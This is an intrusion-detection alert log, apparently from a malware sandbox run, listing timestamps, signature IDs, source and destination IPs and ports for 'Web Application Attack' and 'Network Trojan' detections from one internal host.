              2024-12-13T01:14:56.741001+010020290341Web Application Attack192.168.2.235446276.157.108.1745501TCP
              2024-12-13T01:14:56.757442+010020290341Web Application Attack192.168.2.2340106122.124.172.165501TCP
              2024-12-13T01:14:56.757533+010020290341Web Application Attack192.168.2.2338670106.47.50.2155501TCP
              2024-12-13T01:14:56.757566+010020290341Web Application Attack192.168.2.2333810211.84.231.875501TCP
              2024-12-13T01:14:56.772221+010020290341Web Application Attack192.168.2.2359170102.158.0.2185501TCP
              2024-12-13T01:14:56.772633+010020290341Web Application Attack192.168.2.2340266120.7.216.05501TCP
              2024-12-13T01:14:56.772737+010020290341Web Application Attack192.168.2.235042452.12.86.1685501TCP
              2024-12-13T01:14:56.772834+010020290341Web Application Attack192.168.2.235367842.183.34.1425501TCP
              2024-12-13T01:14:56.773013+010020290341Web Application Attack192.168.2.2344140207.142.3.1105501TCP
              2024-12-13T01:14:56.773107+010020290341Web Application Attack192.168.2.2359858113.100.123.725501TCP
              2024-12-13T01:14:56.773299+010020290341Web Application Attack192.168.2.235091874.10.112.635501TCP
              2024-12-13T01:14:56.773386+010020290341Web Application Attack192.168.2.235103289.126.34.1485501TCP
              2024-12-13T01:14:56.773488+010020290341Web Application Attack192.168.2.233636452.91.248.355501TCP
              2024-12-13T01:14:56.788158+010020290341Web Application Attack192.168.2.2335742133.144.61.785501TCP
              2024-12-13T01:14:56.788402+010020290341Web Application Attack192.168.2.2335796198.130.15.2035501TCP
              2024-12-13T01:14:56.788535+010020290341Web Application Attack192.168.2.233803689.95.26.1295501TCP
              2024-12-13T01:14:56.803734+010020290341Web Application Attack192.168.2.2333158176.166.15.1275501TCP
              2024-12-13T01:14:56.803906+010020290341Web Application Attack192.168.2.2356832101.7.61.765501TCP
              2024-12-13T01:14:56.804123+010020290341Web Application Attack192.168.2.2358902124.90.72.1875501TCP
              2024-12-13T01:14:56.804207+010020290341Web Application Attack192.168.2.2342086161.254.106.585501TCP
              2024-12-13T01:14:56.804321+010020290341Web Application Attack192.168.2.2347092150.111.127.1365501TCP
              2024-12-13T01:14:56.804731+010020290341Web Application Attack192.168.2.2348696177.135.163.1965501TCP
              2024-12-13T01:14:56.804921+010020290341Web Application Attack192.168.2.2352482126.5.129.2135501TCP
              2024-12-13T01:14:56.805748+010020290341Web Application Attack192.168.2.2337042152.211.76.2235501TCP
              2024-12-13T01:14:56.805933+010020290341Web Application Attack192.168.2.2345482131.221.215.965501TCP
              2024-12-13T01:14:56.806189+010020290341Web Application Attack192.168.2.234251023.39.211.935501TCP
              2024-12-13T01:15:00.054569+010020290341Web Application Attack192.168.2.2346242144.103.158.2195501TCP
              2024-12-13T01:15:00.100536+010020290341Web Application Attack192.168.2.2341292157.247.228.1215501TCP
              2024-12-13T01:15:00.100872+010020290341Web Application Attack192.168.2.233922694.147.93.255501TCP
              2024-12-13T01:15:00.116214+010020290341Web Application Attack192.168.2.2335616160.237.248.1405501TCP
              2024-12-13T01:15:00.131989+010020290341Web Application Attack192.168.2.2355176106.119.26.165501TCP
              2024-12-13T01:15:00.147471+010020290341Web Application Attack192.168.2.233363464.159.55.265501TCP
              2024-12-13T01:15:00.163172+010020290341Web Application Attack192.168.2.235067699.78.204.1405501TCP
              2024-12-13T01:15:00.194480+010020290341Web Application Attack192.168.2.2351108209.47.138.2215501TCP
              2024-12-13T01:15:00.210136+010020290341Web Application Attack192.168.2.234061693.77.76.1665501TCP
              2024-12-13T01:15:00.210267+010020290341Web Application Attack192.168.2.2343446122.250.210.2325501TCP
              2024-12-13T01:15:00.210318+010020290341Web Application Attack192.168.2.235078836.208.171.1745501TCP
              2024-12-13T01:15:00.210776+010020290341Web Application Attack192.168.2.2359938141.213.202.485501TCP
              2024-12-13T01:15:00.227095+010020290341Web Application Attack192.168.2.2353614219.219.30.915501TCP
              2024-12-13T01:15:00.227195+010020290341Web Application Attack192.168.2.2339174152.100.121.2015501TCP
              2024-12-13T01:15:00.227196+010020290341Web Application Attack192.168.2.236093490.237.45.915501TCP
              2024-12-13T01:15:00.256986+010020290341Web Application Attack192.168.2.2337294118.232.62.305501TCP
              2024-12-13T01:15:00.257138+010020290341Web Application Attack192.168.2.2346820115.111.202.275501TCP
              2024-12-13T01:15:00.257221+010020290341Web Application Attack192.168.2.234493277.55.69.45501TCP
              2024-12-13T01:15:00.272538+010020290341Web Application Attack192.168.2.234621262.96.196.845501TCP
              2024-12-13T01:15:01.069739+010020290341Web Application Attack192.168.2.234004427.79.219.2475501TCP
              2024-12-13T01:15:01.085836+010020290341Web Application Attack192.168.2.2343780154.92.145.2175501TCP
              2024-12-13T01:15:01.101182+010020290341Web Application Attack192.168.2.2353956142.11.131.1095501TCP
              2024-12-13T01:15:01.101240+010020290341Web Application Attack192.168.2.2358688114.134.25.2235501TCP
              2024-12-13T01:15:01.101249+010020290341Web Application Attack192.168.2.233595460.20.174.1725501TCP
              2024-12-13T01:15:01.101276+010020290341Web Application Attack192.168.2.2348788220.88.243.695501TCP
              2024-12-13T01:15:01.101585+010020290341Web Application Attack192.168.2.2336618150.113.165.165501TCP
              2024-12-13T01:15:01.102216+010020290341Web Application Attack192.168.2.2359342185.79.179.2175501TCP
              2024-12-13T01:15:01.149784+010020290341Web Application Attack192.168.2.2360900216.67.24.2305501TCP
              2024-12-13T01:15:01.319534+010020290341Web Application Attack192.168.2.23596322.212.43.1385501TCP
              2024-12-13T01:15:02.304094+010020290341Web Application Attack192.168.2.2348214176.101.204.665501TCP
              2024-12-13T01:15:02.554733+010020290341Web Application Attack192.168.2.2345892165.253.80.265501TCP
              2024-12-13T01:15:02.554735+010020290341Web Application Attack192.168.2.233695823.217.76.1855501TCP
              2024-12-13T01:15:02.819611+010020290341Web Application Attack192.168.2.2332826104.93.24.1725501TCP
              2024-12-13T01:15:02.819615+010020290341Web Application Attack192.168.2.235395617.240.133.1785501TCP
              2024-12-13T01:15:02.835061+010020290341Web Application Attack192.168.2.235579447.88.154.1165501TCP
              2024-12-13T01:15:02.835143+010020290341Web Application Attack192.168.2.2353862148.211.229.2385501TCP
              2024-12-13T01:15:02.835322+010020290341Web Application Attack192.168.2.2348894143.116.107.685501TCP
              2024-12-13T01:15:03.163493+010020290341Web Application Attack192.168.2.2335354217.109.131.1865501TCP
              2024-12-13T01:15:03.257328+010020290341Web Application Attack192.168.2.2357336222.207.27.135501TCP
              2024-12-13T01:15:03.601608+010020290341Web Application Attack192.168.2.233703690.5.134.1995501TCP
              2024-12-13T01:15:03.852693+010020290341Web Application Attack192.168.2.2355998122.6.43.305501TCP
              2024-12-13T01:15:05.022806+010020290341Web Application Attack192.168.2.234076423.172.41.1655501TCP
              2024-12-13T01:15:06.038296+010020290341Web Application Attack192.168.2.2351140182.7.112.1935501TCP
              2024-12-13T01:15:06.038304+010020290341Web Application Attack192.168.2.2356150100.24.234.2195501TCP
              2024-12-13T01:15:06.038427+010020290341Web Application Attack192.168.2.2332850209.67.99.1825501TCP
              2024-12-13T01:15:06.038536+010020290341Web Application Attack192.168.2.234553041.119.102.115501TCP
              2024-12-13T01:15:06.038681+010020290341Web Application Attack192.168.2.2352436208.114.135.2555501TCP
              2024-12-13T01:15:06.038864+010020290341Web Application Attack192.168.2.2360976197.236.103.2145501TCP
              2024-12-13T01:15:06.053904+010020290341Web Application Attack192.168.2.235536480.186.109.1585501TCP
              2024-12-13T01:15:06.053916+010020290341Web Application Attack192.168.2.2360666168.120.209.335501TCP
              2024-12-13T01:15:06.054088+010020290341Web Application Attack192.168.2.2349742148.134.31.1135501TCP
              2024-12-13T01:15:06.147739+010020290341Web Application Attack192.168.2.235635069.155.12.1455501TCP
              2024-12-13T01:15:06.163055+010020290341Web Application Attack192.168.2.2354788177.9.26.635501TCP
              2024-12-13T01:15:06.163161+010020290341Web Application Attack192.168.2.2344938150.238.186.675501TCP
              2024-12-13T01:15:07.304580+010020290341Web Application Attack192.168.2.234531035.47.69.1675501TCP
              2024-12-13T01:15:07.304899+010020290341Web Application Attack192.168.2.2339348218.223.37.455501TCP
              2024-12-13T01:15:07.305124+010020290341Web Application Attack192.168.2.233500442.24.133.335501TCP
              2024-12-13T01:15:07.319979+010020290341Web Application Attack192.168.2.2339370155.25.92.495501TCP
              2024-12-13T01:15:08.053799+010020290341Web Application Attack192.168.2.234648263.242.80.2005501TCP
              2024-12-13T01:15:08.303750+010020290341Web Application Attack192.168.2.2341014134.66.130.2115501TCP
              2024-12-13T01:15:08.303897+010020290341Web Application Attack192.168.2.2343602156.88.12.295501TCP
              2024-12-13T01:15:08.303989+010020290341Web Application Attack192.168.2.2357656167.220.127.475501TCP
              2024-12-13T01:15:08.304075+010020290341Web Application Attack192.168.2.2344972138.108.78.1445501TCP
              2024-12-13T01:15:08.304171+010020290341Web Application Attack192.168.2.2338414208.75.58.435501TCP
              2024-12-13T01:15:08.304262+010020290341Web Application Attack192.168.2.2357498185.42.85.1335501TCP
              2024-12-13T01:15:08.350561+010020290341Web Application Attack192.168.2.2351406168.64.76.2515501TCP
              2024-12-13T01:15:09.351160+010020290341Web Application Attack192.168.2.2339562138.102.61.335501TCP
              2024-12-13T01:15:09.382042+010020290341Web Application Attack192.168.2.2350938135.80.121.1645501TCP
              2024-12-13T01:15:09.413257+010020290341Web Application Attack192.168.2.234316892.9.8.1755501TCP
              2024-12-13T01:15:09.413505+010020290341Web Application Attack192.168.2.2333268180.221.147.645501TCP
              2024-12-13T01:15:09.429101+010020290341Web Application Attack192.168.2.234138857.214.100.635501TCP
              2024-12-13T01:15:09.475982+010020290341Web Application Attack192.168.2.2357766144.69.147.1655501TCP
              2024-12-13T01:15:10.350936+010020290341Web Application Attack192.168.2.2338590222.53.105.1425501TCP
              2024-12-13T01:15:10.351012+010020290341Web Application Attack192.168.2.2342162136.135.157.2315501TCP
              2024-12-13T01:15:10.475915+010020290341Web Application Attack192.168.2.2343866201.196.74.1545501TCP
              2024-12-13T01:15:11.350680+010020290341Web Application Attack192.168.2.234888087.32.114.2195501TCP
              2024-12-13T01:15:11.350740+010020290341Web Application Attack192.168.2.2354464107.95.233.225501TCP
              2024-12-13T01:15:11.366719+010020290341Web Application Attack192.168.2.2339600193.86.37.1015501TCP
              2024-12-13T01:15:11.461598+010020290341Web Application Attack192.168.2.2346750153.229.43.2365501TCP
              2024-12-13T01:15:12.632084+010020290341Web Application Attack192.168.2.235231082.125.57.2005501TCP
              2024-12-13T01:15:12.632329+010020290341Web Application Attack192.168.2.234466685.121.137.185501TCP
              2024-12-13T01:15:12.881851+010020290341Web Application Attack192.168.2.234713273.139.51.25501TCP
              2024-12-13T01:15:12.913394+010020290341Web Application Attack192.168.2.2345580117.178.215.1565501TCP
              2024-12-13T01:15:13.772896+010020290341Web Application Attack192.168.2.234808468.6.178.765501TCP
              2024-12-13T01:15:13.773002+010020290341Web Application Attack192.168.2.2351260131.1.57.1335501TCP
              2024-12-13T01:15:13.773131+010020290341Web Application Attack192.168.2.2335574212.67.182.2015501TCP
              2024-12-13T01:15:13.773141+010020290341Web Application Attack192.168.2.2360120158.233.52.1245501TCP
              2024-12-13T01:15:13.804293+010020290341Web Application Attack192.168.2.2357346183.102.78.1675501TCP
              2024-12-13T01:15:13.804382+010020290341Web Application Attack192.168.2.2347146176.193.153.2405501TCP
              2024-12-13T01:15:14.804540+010020290341Web Application Attack192.168.2.2356774192.56.187.345501TCP
              2024-12-13T01:15:14.804540+010020290341Web Application Attack192.168.2.235016461.248.12.1375501TCP
              2024-12-13T01:15:14.804553+010020290341Web Application Attack192.168.2.2358514125.171.187.1195501TCP
              2024-12-13T01:15:14.805145+010020290341Web Application Attack192.168.2.234524232.191.176.1505501TCP
              2024-12-13T01:15:14.819506+010020290341Web Application Attack192.168.2.2352336131.4.227.595501TCP
              2024-12-13T01:15:14.851017+010020290341Web Application Attack192.168.2.233335699.197.232.1435501TCP
              2024-12-13T01:15:15.054268+010020290341Web Application Attack192.168.2.2336992143.18.61.315501TCP
              2024-12-13T01:15:15.883392+010020290341Web Application Attack192.168.2.2338832208.169.18.765501TCP
              2024-12-13T01:15:15.899100+010020290341Web Application Attack192.168.2.2344556130.54.234.1635501TCP
              2024-12-13T01:15:15.899235+010020290341Web Application Attack192.168.2.233783044.21.167.1225501TCP
              2024-12-13T01:15:15.914556+010020290341Web Application Attack192.168.2.2341132115.214.19.1805501TCP
              2024-12-13T01:15:16.148438+010020290341Web Application Attack192.168.2.2346312110.155.123.1745501TCP
              2024-12-13T01:15:16.179763+010020290341Web Application Attack192.168.2.2349894182.117.155.405501TCP
              2024-12-13T01:15:19.320004+010020290341Web Application Attack192.168.2.236003877.72.21.1805501TCP
              2024-12-13T01:15:19.320035+010020290341Web Application Attack192.168.2.234655468.255.124.1905501TCP
              2024-12-13T01:15:19.320188+010020290341Web Application Attack192.168.2.2345768207.212.58.595501TCP
              2024-12-13T01:15:19.320320+010020290341Web Application Attack192.168.2.2360164150.176.156.605501TCP
              2024-12-13T01:15:19.335407+010020290341Web Application Attack192.168.2.234528614.221.84.1255501TCP
              2024-12-13T01:15:19.351422+010020290341Web Application Attack192.168.2.235144069.79.130.1015501TCP
              2024-12-13T01:15:20.320421+010020290341Web Application Attack192.168.2.235532675.146.4.2005501TCP
              2024-12-13T01:15:20.335425+010020290341Web Application Attack192.168.2.234323097.240.130.535501TCP
              2024-12-13T01:15:20.335628+010020290341Web Application Attack192.168.2.2358386198.86.144.985501TCP
              2024-12-13T01:15:22.351440+010020290341Web Application Attack192.168.2.234462017.69.21.1415501TCP
              2024-12-13T01:15:22.351453+010020290341Web Application Attack192.168.2.2349600197.63.96.2465501TCP
              2024-12-13T01:15:22.476223+010020290341Web Application Attack192.168.2.2349934192.91.67.1545501TCP
              2024-12-13T01:15:22.476231+010020290341Web Application Attack192.168.2.234670645.68.181.845501TCP
              2024-12-13T01:15:22.476243+010020290341Web Application Attack192.168.2.2347294187.106.65.2225501TCP
              2024-12-13T01:15:22.554382+010020290341Web Application Attack192.168.2.233897295.53.27.2305501TCP
              2024-12-13T01:15:23.811050+010020290341Web Application Attack192.168.2.2338396222.237.34.1415501TCP
              2024-12-13T01:15:23.851966+010020290341Web Application Attack192.168.2.2339924185.63.143.2555501TCP
              2024-12-13T01:15:23.866808+010020290341Web Application Attack192.168.2.2335860163.130.31.1685501TCP
              2024-12-13T01:15:23.866925+010020290341Web Application Attack192.168.2.233358819.100.194.815501TCP
              2024-12-13T01:15:24.882321+010020290341Web Application Attack192.168.2.2344740211.83.192.825501TCP
              2024-12-13T01:15:25.007398+010020290341Web Application Attack192.168.2.2342582125.62.223.775501TCP
              2024-12-13T01:15:26.898156+010020290341Web Application Attack192.168.2.2335856102.43.129.2555501TCP
              2024-12-13T01:15:30.741813+010020290341Web Application Attack192.168.2.234922260.246.206.2215501TCP
              2024-12-13T01:15:34.601511+010020290341Web Application Attack192.168.2.2340082118.248.116.1115501TCP
              2024-12-13T01:15:35.351462+010020290341Web Application Attack192.168.2.2334470223.212.221.1005501TCP
              2024-12-13T01:15:35.476479+010020290341Web Application Attack192.168.2.234886452.21.187.165501TCP
              2024-12-13T01:15:37.647786+010020290341Web Application Attack192.168.2.234811047.49.104.1605501TCP
              2024-12-13T01:15:37.742263+010020290341Web Application Attack192.168.2.2356510160.144.173.2315501TCP
              2024-12-13T01:15:37.773490+010020290341Web Application Attack192.168.2.2336214190.93.96.275501TCP
              2024-12-13T01:15:37.882772+010020290341Web Application Attack192.168.2.23506508.126.1.645501TCP
              2024-12-13T01:15:37.898590+010020290341Web Application Attack192.168.2.2351668118.115.52.2545501TCP
              2024-12-13T01:15:38.742044+010020290341Web Application Attack192.168.2.2354248139.156.242.155501TCP
              2024-12-13T01:15:40.804684+010020290341Web Application Attack192.168.2.2335784223.231.147.25501TCP
              2024-12-13T01:15:40.929402+010020290341Web Application Attack192.168.2.2337694132.134.188.2175501TCP
              2024-12-13T01:15:40.929514+010020290341Web Application Attack192.168.2.235702269.210.252.2475501TCP
              2024-12-13T01:15:43.351559+010020290341Web Application Attack192.168.2.2354252222.173.226.425501TCP
              2024-12-13T01:15:45.508244+010020290341Web Application Attack192.168.2.2347238193.113.167.1095501TCP
              2024-12-13T01:15:46.383061+010020290341Web Application Attack192.168.2.234816847.127.216.2545501TCP
              2024-12-13T01:15:46.398971+010020290341Web Application Attack192.168.2.2335658148.193.197.825501TCP
              2024-12-13T01:15:46.507559+010020290341Web Application Attack192.168.2.2337934162.25.104.505501TCP
              2024-12-13T01:15:47.660899+010020290341Web Application Attack192.168.2.234574460.138.12.335501TCP
              2024-12-13T01:15:47.805529+010020290341Web Application Attack192.168.2.2341476144.151.41.895501TCP
              2024-12-13T01:15:47.805602+010020290341Web Application Attack192.168.2.23527689.160.33.115501TCP
              2024-12-13T01:15:47.820395+010020290341Web Application Attack192.168.2.235621646.5.8.1085501TCP
              2024-12-13T01:15:48.554929+010020290341Web Application Attack192.168.2.235621620.180.248.2325501TCP
              2024-12-13T01:15:48.555054+010020290341Web Application Attack192.168.2.2359496152.139.122.1795501TCP
              2024-12-13T01:15:48.664287+010020290341Web Application Attack192.168.2.233885095.114.186.2215501TCP
              2024-12-13T01:15:48.805461+010020290341Web Application Attack192.168.2.235045860.180.199.1585501TCP
              2024-12-13T01:15:48.898266+010020290341Web Application Attack192.168.2.2340714130.6.144.1985501TCP
              2024-12-13T01:15:48.914050+010020290341Web Application Attack192.168.2.2344554218.33.94.125501TCP
              2024-12-13T01:15:49.930228+010020290341Web Application Attack192.168.2.234566413.255.28.1595501TCP
              2024-12-13T01:15:50.853127+010020290341Web Application Attack192.168.2.2351136195.61.91.2165501TCP
              2024-12-13T01:15:51.055331+010020290341Web Application Attack192.168.2.2341186136.225.110.675501TCP
              2024-12-13T01:15:51.976544+010020290341Web Application Attack192.168.2.2346472208.81.246.2445501TCP
              2024-12-13T01:15:52.103058+010020290341Web Application Attack192.168.2.2341202135.194.239.2535501TCP
              2024-12-13T01:15:52.103108+010020290341Web Application Attack192.168.2.233290083.244.161.195501TCP
              2024-12-13T01:15:52.227515+010020290341Web Application Attack192.168.2.2335296170.90.85.2255501TCP
              2024-12-13T01:15:52.227517+010020290341Web Application Attack192.168.2.2346484102.141.178.2385501TCP
              2024-12-13T01:15:52.242817+010020290341Web Application Attack192.168.2.235896467.231.184.1855501TCP
              2024-12-13T01:15:53.054894+010020290341Web Application Attack192.168.2.234540883.228.93.985501TCP
              2024-12-13T01:15:53.085893+010020290341Web Application Attack192.168.2.2357574117.29.174.935501TCP
              2024-12-13T01:15:53.086113+010020290341Web Application Attack192.168.2.235963882.160.166.1705501TCP
              2024-12-13T01:15:53.352159+010020290341Web Application Attack192.168.2.235290488.210.208.2075501TCP
              2024-12-13T01:15:54.134253+010020290341Web Application Attack192.168.2.2358782183.129.202.1825501TCP
              2024-12-13T01:15:56.602266+010020290341Web Application Attack192.168.2.235342048.148.149.775501TCP
              2024-12-13T01:15:56.602384+010020290341Web Application Attack192.168.2.234470247.39.45.2195501TCP
              2024-12-13T01:15:57.414542+010020290341Web Application Attack192.168.2.2335460168.172.153.1775501TCP
              2024-12-13T01:15:57.555447+010020290341Web Application Attack192.168.2.2343058101.47.114.2475501TCP
              2024-12-13T01:15:57.854509+010020290341Web Application Attack192.168.2.23520921.249.5.2255501TCP
              2024-12-13T01:15:57.867471+010020290341Web Application Attack192.168.2.235920227.9.151.2415501TCP
              2024-12-13T01:15:58.383112+010020290341Web Application Attack192.168.2.235251825.216.246.2495501TCP
              2024-12-13T01:15:58.383214+010020290341Web Application Attack192.168.2.234007298.7.217.2055501TCP
              2024-12-13T01:15:58.398575+010020290341Web Application Attack192.168.2.2334866161.42.197.2235501TCP
              2024-12-13T01:16:01.932778+010020290341Web Application Attack192.168.2.233480427.236.21.435501TCP
              2024-12-13T01:16:02.226968+010020290341Web Application Attack192.168.2.2343584219.211.10.1335501TCP
              2024-12-13T01:16:02.259241+010020290341Web Application Attack192.168.2.23576924.247.26.2535501TCP
              2024-12-13T01:16:02.274023+010020290341Web Application Attack192.168.2.233350239.106.212.1775501TCP
              2024-12-13T01:16:04.926366+010020290341Web Application Attack192.168.2.2351728221.166.127.2315501TCP
              2024-12-13T01:16:05.149220+010020290341Web Application Attack192.168.2.235061649.89.6.2275501TCP
              2024-12-13T01:16:05.258186+010020290341Web Application Attack192.168.2.2353162164.203.129.1605501TCP
              2024-12-13T01:16:06.280283+010020290341Web Application Attack192.168.2.233321491.200.146.2035501TCP
              2024-12-13T01:16:07.149229+010020290341Web Application Attack192.168.2.233907049.18.64.675501TCP
              2024-12-13T01:16:07.164582+010020290341Web Application Attack192.168.2.2354562134.14.51.2555501TCP
              2024-12-13T01:16:07.430436+010020290341Web Application Attack192.168.2.2337358198.90.198.325501TCP
              2024-12-13T01:16:11.727441+010020290341Web Application Attack192.168.2.2351750183.24.139.1495501TCP
              2024-12-13T01:16:11.853000+010020290341Web Application Attack192.168.2.2350828104.17.4.1345501TCP
              2024-12-13T01:16:11.853118+010020290341Web Application Attack192.168.2.235909214.248.126.155501TCP
              2024-12-13T01:16:11.853134+010020290341Web Application Attack192.168.2.235634489.33.108.1925501TCP
              2024-12-13T01:16:12.727150+010020290341Web Application Attack192.168.2.2354764182.52.185.2425501TCP
              2024-12-13T01:16:12.727295+010020290341Web Application Attack192.168.2.235798472.164.232.1065501TCP
              2024-12-13T01:16:12.727321+010020290341Web Application Attack192.168.2.2354322178.253.149.385501TCP
              2024-12-13T01:16:12.727454+010020290341Web Application Attack192.168.2.2342792103.118.67.815501TCP
              2024-12-13T01:16:12.868321+010020290341Web Application Attack192.168.2.234168899.147.89.945501TCP
              2024-12-13T01:16:12.868321+010020290341Web Application Attack192.168.2.234529637.120.101.1185501TCP
              2024-12-13T01:16:12.883863+010020290341Web Application Attack192.168.2.2359348182.253.191.1855501TCP
              2024-12-13T01:16:13.011243+010020290341Web Application Attack192.168.2.2350456164.60.186.695501TCP
              2024-12-13T01:16:13.011530+010020290341Web Application Attack192.168.2.2339916110.142.153.1955501TCP
              2024-12-13T01:16:13.742447+010020290341Web Application Attack192.168.2.23490544.189.150.535501TCP
              2024-12-13T01:16:13.742557+010020290341Web Application Attack192.168.2.2334090122.107.195.95501TCP
              2024-12-13T01:16:15.024435+010020290341Web Application Attack192.168.2.2354804156.58.68.1585501TCP
              2024-12-13T01:16:18.056326+010020290341Web Application Attack192.168.2.2357784144.67.79.2305501TCP
              2024-12-13T01:16:19.150521+010020290341Web Application Attack192.168.2.23369661.228.174.1695501TCP
              2024-12-13T01:16:19.308525+010020290341Web Application Attack192.168.2.234091651.96.241.2415501TCP
              2024-12-13T01:16:20.024685+010020290341Web Application Attack192.168.2.234704275.114.97.535501TCP
              2024-12-13T01:16:22.181056+010020290341Web Application Attack192.168.2.2360742151.1.179.305501TCP
              2024-12-13T01:16:23.477633+010020290341Web Application Attack192.168.2.2356724212.22.24.1825501TCP
              2024-12-13T01:16:24.322303+010020290341Web Application Attack192.168.2.234091436.168.100.2025501TCP
              2024-12-13T01:16:25.478131+010020290341Web Application Attack192.168.2.235713664.151.171.2095501TCP
              2024-12-13T01:16:26.247353+010020290341Web Application Attack192.168.2.233722635.230.232.1515501TCP
              2024-12-13T01:16:26.493183+010020290341Web Application Attack192.168.2.2347124219.160.220.105501TCP
              2024-12-13T01:16:26.617914+010020290341Web Application Attack192.168.2.2334478186.146.252.1575501TCP
              2024-12-13T01:16:26.743407+010020290341Web Application Attack192.168.2.2341556160.101.179.455501TCP
              2024-12-13T01:16:26.743725+010020290341Web Application Attack192.168.2.2358022111.143.42.1005501TCP
              2024-12-13T01:16:28.508443+010020290341Web Application Attack192.168.2.2351666187.21.206.2285501TCP
              2024-12-13T01:16:28.508614+010020290341Web Application Attack192.168.2.2360232213.227.27.2545501TCP
              2024-12-13T01:16:28.524207+010020290341Web Application Attack192.168.2.2348986171.169.82.2555501TCP
              2024-12-13T01:16:29.665071+010020290341Web Application Attack192.168.2.2347800102.252.89.835501TCP
              2024-12-13T01:16:29.680631+010020290341Web Application Attack192.168.2.234398481.232.190.1375501TCP
              2024-12-13T01:16:30.102808+010020290341Web Application Attack192.168.2.234973636.104.44.1195501TCP
              2024-12-13T01:16:30.102809+010020290341Web Application Attack192.168.2.2359882107.172.196.2415501TCP
              2024-12-13T01:16:31.103083+010020290341Web Application Attack192.168.2.233288257.251.167.1715501TCP
              2024-12-13T01:16:31.186721+010020290341Web Application Attack192.168.2.233891623.239.28.245501TCP
              2024-12-13T01:16:31.228077+010020290341Web Application Attack192.168.2.235260468.248.30.695501TCP
              2024-12-13T01:16:31.977714+010020290341Web Application Attack192.168.2.2349320162.66.160.365501TCP
              2024-12-13T01:16:32.274935+010020290341Web Application Attack192.168.2.234750880.140.153.2265501TCP
              2024-12-13T01:16:32.400209+010020290341Web Application Attack192.168.2.2358230196.131.205.115501TCP
              2024-12-13T01:16:32.538222+010020290341Web Application Attack192.168.2.2343688125.91.106.1935501TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348464160.199.110.2237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358752160.211.228.19837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352332160.210.82.23737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358422197.239.9.2737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350970223.57.51.19837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350444197.118.192.637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344848156.167.231.1637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354612197.214.45.10737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349742105.234.163.2337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334248105.127.117.16137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.233792441.234.125.20837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359222186.189.201.14637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342102102.159.158.1337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349584102.157.107.5637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358414186.64.194.13737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337872105.79.247.13937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348168197.148.138.14337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358030156.168.94.737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357982102.197.44.8137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352016156.134.12.1737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342298156.91.0.21137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338862186.169.115.18537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353104186.94.140.19237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351440197.189.134.637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343980156.92.33.19737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356666181.193.110.25537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353618160.65.13.14437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342736105.102.142.7237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349232197.19.238.24137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338664186.169.30.19237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360252181.182.120.13537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333530190.193.81.4637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353570186.150.217.2337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353738190.14.178.11137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335976156.241.93.7137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345530186.172.151.2637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353640223.98.12.13737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347886186.30.221.17637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360200190.4.81.15437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340962223.36.73.12437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344400156.22.146.12837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349156160.154.121.24037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338564105.204.210.17637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356886102.60.222.23437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335248156.141.100.14337215TCP
